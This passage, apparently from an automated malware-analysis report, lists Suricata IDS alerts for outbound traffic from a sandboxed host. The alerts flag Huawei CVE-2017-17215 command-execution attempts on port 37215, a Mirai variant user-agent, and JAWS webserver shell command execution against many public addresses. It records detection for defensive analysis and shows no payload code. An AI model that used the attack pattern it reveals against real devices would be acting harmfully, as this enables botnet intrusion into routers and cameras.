          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51134 -> 41.72.40.186:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38364 -> 156.30.63.25:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47198 -> 102.244.213.7:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57052 -> 197.36.67.95:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54208 -> 156.173.48.6:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47198 -> 102.244.213.7:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50584 -> 165.204.23.192:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50584 -> 165.204.23.192:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48634 -> 206.130.193.31:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36286 -> 82.117.212.11:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48634 -> 206.130.193.31:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36286 -> 82.117.212.11:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55076 -> 20.46.92.83:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55076 -> 20.46.92.83:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59224 -> 155.1.144.0:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42842 -> 196.188.148.76:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49278 -> 209.24.153.157:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49278 -> 209.24.153.157:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42842 -> 196.188.148.76:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59224 -> 155.1.144.0:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36528 -> 173.92.73.28:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36528 -> 173.92.73.28:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38642 -> 129.65.108.220:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38642 -> 129.65.108.220:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49590 -> 157.22.181.36:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49590 -> 157.22.181.36:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49166 -> 207.31.188.4:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49166 -> 207.31.188.4:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58934 -> 156.136.30.83:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57838 -> 197.205.167.250:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38904 -> 189.182.4.61:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51112 -> 154.142.82.9:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38904 -> 189.182.4.61:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51112 -> 154.142.82.9:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59332 -> 155.118.130.193:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55200 -> 102.76.177.99:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55200 -> 102.76.177.99:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48552 -> 129.148.53.122:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59332 -> 155.118.130.193:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48552 -> 129.148.53.122:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39834 -> 123.103.236.184:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39834 -> 123.103.236.184:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56648 -> 209.127.151.124:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56648 -> 209.127.151.124:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43724 -> 197.102.235.77:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42506 -> 197.120.156.119:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48718 -> 200.217.174.254:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48718 -> 200.217.174.254:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38640 -> 156.218.59.212:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41428 -> 41.14.50.44:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41050 -> 197.159.147.46:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60084 -> 129.211.245.21:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33892 -> 197.127.87.85:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51316 -> 197.17.103.86:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60084 -> 129.211.245.21:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37358 -> 110.248.91.166:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35862 -> 41.43.153.43:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37358 -> 110.248.91.166:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56500 -> 39.172.171.102:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56500 -> 39.172.171.102:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60542 -> 41.208.59.239:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45398 -> 156.209.91.207:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33562 -> 197.144.147.132:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54930 -> 156.9.30.47:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34878 -> 156.191.123.120:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35912 -> 197.145.151.250:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54846 -> 156.103.184.211:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43246 -> 197.141.228.35:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48328 -> 156.7.85.127:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52378 -> 197.26.35.39:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44954 -> 197.133.93.229:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45482 -> 41.59.198.162:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47106 -> 41.109.98.56:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58618 -> 197.118.170.210:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41560 -> 156.133.251.13:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42166 -> 197.17.71.168:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37848 -> 197.103.210.192:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46944 -> 41.254.131.163:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42680 -> 41.5.217.19:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36492 -> 156.102.50.103:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38814 -> 197.164.229.139:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42094 -> 41.117.51.108:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58030 -> 197.112.51.51:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41958 -> 197.115.32.3:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34020 -> 197.132.239.110:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58626 -> 41.34.214.87:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59774 -> 197.150.122.145:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38532 -> 156.89.14.119:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33948 -> 197.33.53.110:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47314 -> 41.220.241.148:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33108 -> 156.2.213.29:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43364 -> 41.45.183.253:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49732 -> 41.127.74.226:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33752 -> 41.147.45.161:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44924 -> 197.103.182.67:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44534 -> 156.69.249.252:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58368 -> 197.127.1.201:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51756 -> 41.218.179.25:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51224 -> 41.235.173.53:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49350 -> 222.56.136.103:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49350 -> 222.56.136.103:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56236 -> 156.61.1.184:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60146 -> 37.167.205.59:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49094 -> 85.167.75.107:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42722 -> 197.225.68.91:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49094 -> 85.167.75.107:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60146 -> 37.167.205.59:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59426 -> 41.101.114.169:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41350 -> 218.240.211.54:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41350 -> 218.240.211.54:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46794 -> 41.179.220.250:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60458 -> 156.208.104.233:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47758 -> 41.234.62.63:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39082 -> 40.206.44.12:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39082 -> 40.206.44.12:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35830 -> 131.251.233.12:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35830 -> 131.251.233.12:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46234 -> 156.126.205.173:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60202 -> 156.244.187.198:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39432 -> 156.98.219.76:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53530 -> 41.204.93.8:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33256 -> 41.90.157.197:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37580 -> 197.133.185.111:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33430 -> 41.99.9.78:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40592 -> 197.221.96.253:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40174 -> 156.105.61.8:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57836 -> 156.13.114.133:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51728 -> 41.196.239.127:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33492 -> 156.153.72.153:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58448 -> 41.206.26.236:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44030 -> 197.83.152.134:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36116 -> 156.15.254.233:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56578 -> 46.179.166.165:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56578 -> 46.179.166.165:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44612 -> 197.214.201.241:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46742 -> 197.151.72.14:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35484 -> 156.118.69.166:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46992 -> 122.51.34.245:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46992 -> 122.51.34.245:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56018 -> 197.20.71.88:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34112 -> 27.23.244.93:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34112 -> 27.23.244.93:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40884 -> 156.59.68.15:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45804 -> 141.101.229.14:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38046 -> 197.172.41.216:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37164 -> 41.233.58.226:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58910 -> 156.167.104.86:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52558 -> 41.196.234.206:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45804 -> 141.101.229.14:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43326 -> 223.224.73.203:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43326 -> 223.224.73.203:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50104 -> 41.152.153.123:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60528 -> 102.178.231.2:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60528 -> 102.178.231.2:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53306 -> 94.202.68.70:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52820 -> 129.149.237.7:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53306 -> 94.202.68.70:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52820 -> 129.149.237.7:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48330 -> 9.161.88.229:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48330 -> 9.161.88.229:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47960 -> 93.194.123.76:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47960 -> 93.194.123.76:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55370 -> 222.149.156.59:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55370 -> 222.149.156.59:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41280 -> 178.2.115.55:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34228 -> 135.251.244.249:80
